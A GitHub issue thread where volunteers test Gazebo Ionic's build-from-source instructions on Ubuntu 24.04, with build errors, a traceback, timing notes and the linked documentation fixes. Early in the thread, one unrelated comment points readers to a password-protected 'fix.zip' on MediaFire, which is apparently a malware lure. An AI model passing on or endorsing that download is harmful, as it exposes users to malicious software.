gazebosim/gazebo_test_cases #1699: docs: install_ubuntu_src

azeey-test, 2024-08-29:
## Configuration

* buildType: Source
* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/install_ubuntu_src)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/install_ubuntu_src.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

fan1chun, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Mechazo11, 2024-08-29:
Interested

Mechazo11, 2024-09-01:
* **Test enviornment**
    ```terminal
    CPU: Ryzen 5 5600x, Ram: 32GB @ 3200 Mhz, GPU: RTX 3080
    Clean copy of Ubuntu 24.04 Humble
    ROS 2 Jazzy Jalisco Full desktop installation
    ```

* **Summary**
    * Can build and source Gazebo Ionic packages but some auxilillary instructions/software fails to build.

* **Issues**
    
    1. Commands ```pip install vcstool || pip3 install vcstool``` and ```pip install -U colcon-common-extensions || pip3 install -U colcon-common-extensions``` throws  ```externally-managed-enviornment``` **error**.  This appears to be a [reported problem](https://stackoverflow.com/questions/75608323/how-do-i-solve-error-externally-managed-environment-every-time-i-use-pip-3) since ```Python 3.11+```. 
    
    2. ```colcon build --cmake-args -DQT_QML_DEBUG --merge-install``` **fails** with the following error message

    ```terminal
    colcon build --cmake-args -DQT_QML_DEBUG --merge-install
    Starting >>> gz-cmake4
    --- stderr: gz-cmake4
    CMake Error: Parse error in command line argument: QT_QML_DEBUG
    Should be: VAR:type=value

    CMake Error: Run 'cmake --help' for all supported options.
    Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/colcon_core/executor/__init__.py", line 91, in __call__
        rc = await self.task(*args, **kwargs)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/lib/python3/dist-packages/colcon_core/task/__init__.py", line 93, in __call__
        return await task_method(*args, **kwargs)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/lib/python3/dist-packages/colcon_ros/task/cmake/build.py", line 34, in build
        rc = await extension.build(
            ^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/lib/python3/dist-packages/colcon_cmake/task/cmake/build.py", line 87, in build
        rc = await self._reconfigure(args, env)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/lib/python3/dist-packages/colcon_cmake/task/cmake/build.py", line 182, in _reconfigure
        buildfile = get_buildfile(cmake_cache)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/lib/python3/dist-packages/colcon_cmake/task/cmake/__init__.py", line 114, in get_buildfile
        if 'Visual Studio' in generator:
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    TypeError: argument of type 'NoneType' is not iterable
    ---
    Failed   <<< gz-cmake4 [0.02s, exited with code 1]

    Summary: 0 packages finished [0.15s]
    1 package failed: gz-cmake4
    1 package had stderr output: gz-cmake4
    15 packages not processed
    argument of type 'NoneType' is not iterable
    ```

* **Fixes**
    
    * For issue 1, just using the ```.deb``` package installation technique for installing ```vcstool, colcon-common-extensions``` in Ubuntu 22.04 and 24.04.

* **Comments/Suggestions**
    * ```sudo apt-get install git``` may be unnecessary.
    
    * Adding instructions for adding 8GB - 16GB additional swap space. When building multiple packages such as ```gz-gui9, gz-physics8, gz-sensors9```, the ram requirement did exceed 15GB.
    
    * ```colcon build --merge-install``` worked but took **$25$ mins**
    
    * ```colcon build --cmake-args ' -DBUILD_TESTING=OFF' ' -DCMAKE_BUILD_TYPE=Debug' --merge-install``` worked and took **$9$ mins**
    
    * ```colcon build --packages-select gz-sim9 --cmake-args -DQT_QML_DEBUG --merge-install``` would also work if ```gz-cmake4``` error is solved.
    
    * For the ```Troubleshooting``` section there should be a TOC or short one-two linear paragraph stating the type of issues and solutions currently covered in that document file.

Mechazo11, 2024-09-01:
@azeey-test this assignment is done but I don't see the option to close this ticket.

j-rivero, 2024-09-02:
Great review @Mechazo11 ! I'm processing your suggestions. 

> Commands pip install vcstool || pip3 install vcstool and pip install -U colcon-common-extensions || pip3 install -U colcon-common-extensions throws externally-managed-enviornment error. This appears [...]

https://github.com/gazebosim/docs/pull/493

j-rivero, 2024-09-02:
> CMake Error: Parse error in command line argument: QT_QML_DEBUG
> Should be: VAR:type=value

Fixed by https://github.com/gazebosim/docs/pull/494, first commit

> sudo apt-get install git may be unnecessary.

Used by `vcs` under the hood, quite sure we need it.

> * Adding instructions for adding 8GB - 16GB additional swap space. When building multiple packages such as `gz-gui9, gz-physics8, gz-sensors9`, the ram requirement did exceed 15GB.

Added a note about the number of RAM needed and how to limit the compilation threads. https://github.com/gazebosim/docs/pull/494, second commit.

> 

> * For the `Troubleshooting` section there should be a TOC or short one-two linear paragraph stating the type of issues and solutions currently covered in that document file.

Leave this one for you if you are interested in patching the doc :)

Mechazo11, 2024-09-04:
@azeey-test I think this one can be closed

j-rivero, 2024-09-04:
> @azeey-test I think this one can be closed

as said, great work!

closed 2024-09-04 by j-rivero